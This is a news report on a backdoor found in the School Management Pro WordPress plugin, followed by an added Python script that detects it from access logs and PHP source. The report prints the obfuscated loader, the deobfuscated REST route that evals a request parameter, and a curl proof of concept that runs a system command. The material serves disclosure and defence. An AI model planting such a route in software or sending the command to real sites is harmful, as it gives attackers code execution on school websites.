Researchers Discover Backdoor in WordPress Plugin Used by Schools


Researchers said Friday they found a malicious backdoor in a WordPress plugin that gave attackers full control of websites that used the package, which is marketed to schools.

The premium version of School Management, a plugin used by schools to operate and manage their websites, has contained the backdoor since at least version 8.9, researchers at website security service Jetpack said in a blog post, without ruling out that it was present in earlier versions. This page from a third-party site shows that version 8.9 was released last August.

Obvious backdoor

Jetpack said it discovered the backdoor after members of the support team reported finding heavily obfuscated code on several sites that used School Management Pro. After deobfuscating it, they realized that the code, hidden in the license verification part of the plugin, was intentionally placed there in order to give outsiders the ability to take over the sites.

“The code itself isn’t that interesting: it’s an obvious backdoor injected into the plugin’s license verification code,” Jetpack’s post said. “It allows any attacker to execute arbitrary PHP code on the site with the plugin installed.”

In its obfuscated form, the code looked like this:

$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey

After deobfuscation, the code was:

add_action( 'rest_api_init', function() {
        // Registers an unauthenticated REST route at /wp-json/am-member/license
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE, // accepts POST
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                // 'blowfish' acts as a trigger flag; 'blowf' carries the PHP to run
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

The researchers wrote a proof-of-concept exploit that confirmed that the obfuscated code was indeed a backdoor that allowed anyone with knowledge of it to run code of their choosing on any site running the plugin.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

The mystery remains

The number of sites using the plugin is unclear. Weblizar, the India-based maker of School Management, says on its homepage that it has “340k+” customers for its free and premium themes and plugins, but the backdoor Jetpack found was only in School Management Pro. The backdoor was not in the free version of the plugin, and there is no indication that it was placed in any other plugins released by Weblizar.

“We tried to get more information from the vendor on when the backdoor was injected, what versions were affected, and how the code ended up in the plugin in the first place,” the post reads. “That effort was unsuccessful because the vendor says it doesn’t know when or how the code entered its software.”

Attempts to contact Weblizar were unsuccessful.

Now that the presence of the backdoor is public knowledge, attackers are likely to exploit it on any website using a vulnerable version of the plugin. Anyone using this plugin should update immediately. Even after patching, they should also carefully scan their site for signs of compromise, as the update will not remove any new backdoors that may have been added.
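As an added example (not from Jetpack's post or the plugin), here is detection logic a site owner could run: it flags web server requests to the backdoor's REST route shown in the proof of concept above, and it scans PHP source for the obfuscation signatures visible in the code Jetpack quoted (a hex-escaped eval, chr() arithmetic, and eval of a request parameter). The route and parameter names come from the article; the log lines and PHP sample are constructed.

```python
import re

# Route taken from the Jetpack write-up; WordPress also serves REST routes via
# the ?rest_route= query form, so both spellings are matched.
BACKDOOR_ROUTE = re.compile(r"/wp-json/am-member/license\b|rest_route=/?am-member/license\b")

# Apache/nginx combined log format (assumed); captures what we need to triage.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Signatures modelled on the obfuscated snippet quoted in the article.
HEX_EVAL = re.compile(r'eval\s*\(\s*"(?:\\x[0-9a-fA-F]{2}){3,}')   # eval("\x65\x76...
CHR_ARITH = re.compile(r'chr\s*\(\s*\$\w+\s*[-+]?=\s*')            # chr($_x = 0x70 - 7)
EVAL_PARAM = re.compile(r"eval\s*\(\s*\$\w+\s*\[")                  # eval( $args['blowf'] )

# Constructed sample access log: two hits from one source, one benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2022:10:01:02 +0000] "POST /wp-json/am-member/license HTTP/1.1" 200 512 "-" "curl/7.81.0"',
    '198.51.100.2 - - [12/May/2022:10:01:05 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/May/2022:10:02:10 +0000] "POST /index.php?rest_route=/am-member/license HTTP/1.1" 200 64 "-" "python-requests/2.27"',
]

# Constructed PHP fragment mirroring the shapes seen in the quoted backdoor.
SAMPLE_PHP = r'''$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5));
eval( $args['blowf'] );'''


def find_backdoor_requests(lines):
    """Return (ip, timestamp, path, status) for every request to the backdoor route."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and BACKDOOR_ROUTE.search(m["path"]):
            hits.append((m["ip"], m["ts"], m["path"], int(m["status"])))
    return hits


def scan_php_source(src):
    """Return the names of obfuscation/backdoor signatures found in a PHP source string."""
    found = []
    if HEX_EVAL.search(src):
        found.append("hex-escaped eval")
    if CHR_ARITH.search(src):
        found.append("chr() arithmetic")
    if EVAL_PARAM.search(src):
        found.append("eval of request parameter")
    return found


if __name__ == "__main__":
    for hit in find_backdoor_requests(SAMPLE_LOG):
        print("backdoor route hit:", hit)
    print("source signatures:", scan_php_source(SAMPLE_PHP))
```

A 200 response to this route on a site that was running the Pro plugin is a strong indicator that the backdoor was reached, so the matching source IPs and timestamps are the starting point for the post-update compromise review the article recommends.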
